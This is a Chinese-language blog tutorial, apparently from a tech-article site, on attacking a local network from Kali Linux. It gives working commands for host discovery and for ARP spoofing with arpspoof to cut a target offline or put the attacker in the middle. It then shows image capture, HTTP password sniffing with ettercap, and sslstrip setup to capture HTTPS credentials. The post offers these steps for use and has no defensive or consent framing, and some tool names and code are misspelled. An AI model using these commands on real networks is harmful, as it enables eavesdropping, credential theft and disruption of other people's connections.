一篇文章带你了解kali局域网攻击

目录
  • 总结

前言

很久以前的博客才发现,发布一下。
这个系列以后有时间再做。

arp攻击

arp路由链表,感兴趣的自行百度,我的博客我的笔记.

路由指向

介绍两个东西.

echo 0 >/proc/sys/net/ipv4/ip_forward #让经过的数据不留通
echo 1 >/proc/sys/net/ipv4/ip_forward #让数据流通

内网扫描

这个在百度上你可以看到很多相关的方式,比如nmap fping

但是基本上扫描结果不太号,在虚拟机上你会发现你把主机的防火墙关了都扫不到主机.

这里使用netdiscover
当然这里也写几个nmap之类的指令

nmap -PR -sL ip
fping -asg ip
netdiscover -i kali网卡 -r ip(网段)
netdiscover -i eth0 -r 192.168.43.1/30

扫描速度是比较慢的

断网攻击

arpspoof -i kali的网卡 -t 目标地址 目标网卡
arpspoof -i eth0 -t 192.168.43.7 192.168.43.1

arp欺骗信息获取

1.arpspoof -i eth0 -t 192.168.43.7 192.168.43.1 开始欺骗让数据经过你的电脑

2.echo 1 >/proc/sys/net/ipv4/ip_forward 放掉数据包

获取图片

使用工具difinet

difinet -i eth0(网卡)

实际操作:

图片会在那里临时保存

由于网络问题可能会有点卡

获取HTTP连接的密码信息

使用ettercap

其他的操作还是一样的,要开启arp欺骗

ettercap -Tq -i eth0
-T 文本模式 q 安静模式 i 网卡

然后等待即可.不过现在都是https,作用不大

出现中文怎么办,直接赋值中文乱码,之后解码即可

百度搜索url解码

或者直接使用python

中文编码
from urllib.parse import quote,unquote
str1 = '中国'
str2=quote(strl)
print(str2)
解码
print(unquote(str2))

获取HTTPS的密码信息

这个要先修改以下ettercap的配置文件.

vim /etc/ettercap/etter.conf

使用工具 sslstrip

那个吐槽一下 kali 2020是没有sslstrip的原因是没有安装python2的pip 只有pip3

记住一定要先安装python2

在kali里面python 默认为python2 当然你可以用ln -s 修改一下.

apt install python 这个时候会自动安装python 2.7

然后输入以下指令安装sslstrip

git clone https://github.com/moxie0/sslstrip.git
cd sslstrip
python setup.py install

这个是python2的,如果没猜错可能会遇到OpenSSL报错说没有这个模块

pip install pyOpenSSL

总结

本篇文章就到这里了,希望能给你带来帮助,也希望您能够多多关注我们的更多内容!

(0)

相关推荐

  • kali安装docker和portainer的配置方法

    随着docker的出现,很多服务已经慢慢脱离了对硬件架构的依赖,很多arm结构的硬件也能运行x86的服务,docker启动速度和部署的快速性也受到广大极客的青睐,之前我是在自己买的树莓派4B安装了一个kali,我们都知道树莓派是arm架构CPU.我准备在上面部署一个nextcloud所以就想到了docker. 好了,不废话上命令: 1.安装docker和启动docker sudo apt-get install docker sudo systemctl start docker 2.docke

  • 最新超详细虚拟机VMware安装Kali Linux的图文教程

    准备:一台电脑,VMware(VMware安装教程) 一.下载系统镜像文件 1.首先下载系统镜像,进入kali官网,在Downloads中选择Download Kali Linux,如下图所示. 2.根据电脑配置选择合适的版本,在这里我选择的是64位版本,点击HTTP下载镜像文件. 二.创建新的虚拟机 1.打开VMware Workstation,创建新的虚拟机,我们使用自定义的配置方法. 2.导入系统镜像文件. 3.选择客户机操作系统及版本. 4.输入虚拟机的名称和安装位置. 5.点击下一步直

  • VMware kali虚拟机环境配置方法

    1|0编译内核 (1)执行命令uname -r以查看内核版本. (2)执行命令apt-cache search linux-headers查看是否安装内核头文件. (3)  如果uname -r出现的内容在查找内核头文件中有,那就不用安装内核了,如果没有,就输入以下指令以安装. apt-get install linux-headers-$(uname -r) 2|0安装VMware Tools tar zxpf VMwareTools-x.x.x-yyyy.tar.gz cd vmware-t

  • 详解kali linux 常用文件与指令路径

    kali linux 常用文件与指令路径 重启网络 /etc/init.d/networking restart 语言设置文件 /etc/default/locale apt 安装deb保存目录 /var/cache/apt/archives 字体修改目录 /etc/fonts/conf.d 配置更新源文件 /etc/apt/sources.list 配置更多更新源文件,将list文件放入此目录文件 /etc/apt/sources.list.d 配置本机网络lo与eth0接口 /etc/net

  • Kali Linux安装VMware tools安装过程及VM安装vmtools按钮灰色

    小白记录安装vmtools: 1.意义与作用:VMWARE tools是虚拟机自带的软件,安装后可以更新虚拟机中的显卡驱动,鼠标想移出虚拟机也不需要按组合键,在主机和客户机之间时间同步,在主机和客户机之间或者从一台虚拟机到另一台虚拟机进行复制和粘贴操作,简化了操作. 2.如图打开虚拟机,点击安装vmtools选项 (如果安装vmtools像下图一样为灰色,见图2关闭虚拟机,在虚拟机设置CD/DVD和软盘为自动检索再重启就可以了)   2.打开终端,到/media/cdrom0中查看vmtools

  • 一篇文章带你了解kali局域网攻击

    目录 总结 前言 很久以前的博客才发现,发布一下. 这个系列以后有时间再做. arp攻击 arp路由链表,感兴趣的自行百度,我的博客我的笔记. 路由指向 介绍两个东西. echo 0 >/proc/sys/net/ipv4/ip_forward #让经过的数据不留通 echo 1 >/proc/sys/net/ipv4/ip_forward #让数据流通 内网扫描 这个在百度上你可以看到很多相关的方式,比如nmap fping 但是基本上扫描结果不太号,在虚拟机上你会发现你把主机的防火墙关了都

  • 一篇文章带你弄清楚Redis的精髓

    目录 一.Redis的特性 1.1 Redis为什么快? 1.2 Redis其他特性 1.3 Redis高可用 二.Redis数据类型以及使用场景 2.1 String 2.1.1 基本指令 2.1.2 应用场景 2.2 Hash 2.2.1 基本指令 2.2.2 应用场景 2.3 List 2.3.1 基本指令 2.3.2 应用场景 2.4 Set 2.4.1 基本指令 2.4.2 应用场景 2.5 ZSet(SortedSet) 2.5.1 基本指令 2.5.2 应用场景 三.Redis的事

  • 一篇文章带你使用Typescript封装一个Vue组件(简单易懂)

    一.搭建项目以及初始化配置 vue create ts_vue_btn 这里使用了vue CLI3自定义选择的服务,我选择了ts.stylus等工具.然后创建完项目之后,进入项目.使用快捷命令code .进入Vs code编辑器(如果没有code .,需要将编辑器的bin文件目录地址放到环境变量的path中).然后,我进入编辑器之后,进入设置工作区,随便设置一个参数,这里比如推荐设置字号,点下.这里是为了生成.vscode文件夹,里面有个json文件. 我们在开发项目的时候,项目文件夹内的文件很

  • 一篇文章带你搞定SpringBoot中的热部署devtools方法

    一.前期配置 创建项目时,需要加入 DevTools 依赖 二.测试使用 (1)建立 HelloController @RestController public class HelloController { @GetMapping("/hello") public String hello(){ return "hello devtools"; } } 对其进行修改:然后不用重新运行,重新构建即可:只加载变化的类 三.热部署的原理 Spring Boot 中热部

  • 一篇文章带你搞定SpringBoot不重启项目实现修改静态资源

    一.通过配置文件控制静态资源的热部署 在配置文件 application.properties 中添加: #表示从这个默认不触发重启的目录中除去static目录 spring.devtools.restart.exclude=classpath:/static/** 或者使用: #表示将static目录加入到修改资源会重启的目录中来 spring.devtools.restart.additional-paths=src/main/resource/static 此时对static 目录下的静态

  • 一篇文章带你解决 IDEA 每次新建项目 maven home directory 总是改变的问题

    Maven是基bai于项目对象模型,可以通du过一小段描述信息来管理zhi项目的构建,报告和文档的软件项dao目管理工具. 重装个系统,各种问题,idea 也出现各种问题 装了个新版的 idea 2020 2.x 版本的,不知道咋回事,其他都好使,就是创建 SpringBoot 项目时: 加载 pom.xml 总是出错,原因就是,新建立的项目 maven home directory 总是乱,没有安装 设置的默认方式 我试了,改当前项目的,不好使 该默认设置,不好使,网上的其他方法也试了,很奇怪

  • 一篇文章带你使用SpringBoot基于WebSocket的在线群聊实现

    一.添加依赖 加入前端需要用到的依赖: <dependency> <groupId>org.webjars</groupId> <artifactId>sockjs-client</artifactId> <version>1.1.2</version> </dependency> <dependency> <groupId>org.webjars</groupId> <

  • 一篇文章带你搞定 springsecurity基于数据库的认证(springsecurity整合mybatis)

    一.前期配置 1. 加入依赖 <dependency> <groupId>com.alibaba</groupId> <artifactId>druid-spring-boot-starter</artifactId> <version>1.1.10</version> </dependency> <dependency> <groupId>mysql</groupId> &

  • 一篇文章带你搞定Ubuntu中打开Pycharm总是卡顿崩溃

    由于 Ubuntu 中的汉字输入实在是太不友好了,所以装了个 搜狗输入法,好不容易把 搜狗输入法装好,本以为可以开开心心的搞代码了,然而... pycharm 一打开,就崩溃,关不掉,进程杀死还是不行,只能关机重启. 本以为 pycharm 出现了问题,又重装了两遍,还是不行. 最终发现竟然是搜狗输入法以及 fcitx 输入法的锅 唉,只能老老实实的把 fctix 和搜狗输入法卸载了: (1)Ubuntu 软件里卸载 fctix,然后将键盘输入法系统改成 IBus (2)卸载搜狗输入法 先查找软

  • 一篇文章带你搞懂Python类的相关知识

    一.什么是类 类(class),作为代码的父亲,可以说它包裹了很多有趣的函数和方法以及变量,下面我们试着简单创建一个吧. 这样就算创建了我们的第一个类了.大家可以看到这里面有一个self,其实它指的就是类aa的实例.每个类中的函数只要你不是类函数或者静态函数你都得加上这个self,当然你也可以用其他的代替这个self,只不过这是python中的写法,就好比Java 中的this. 二.类的方法 1.静态方法,类方法,普通方法 类一般常用有三种方法,即为static method(静态方法),cl

随机推荐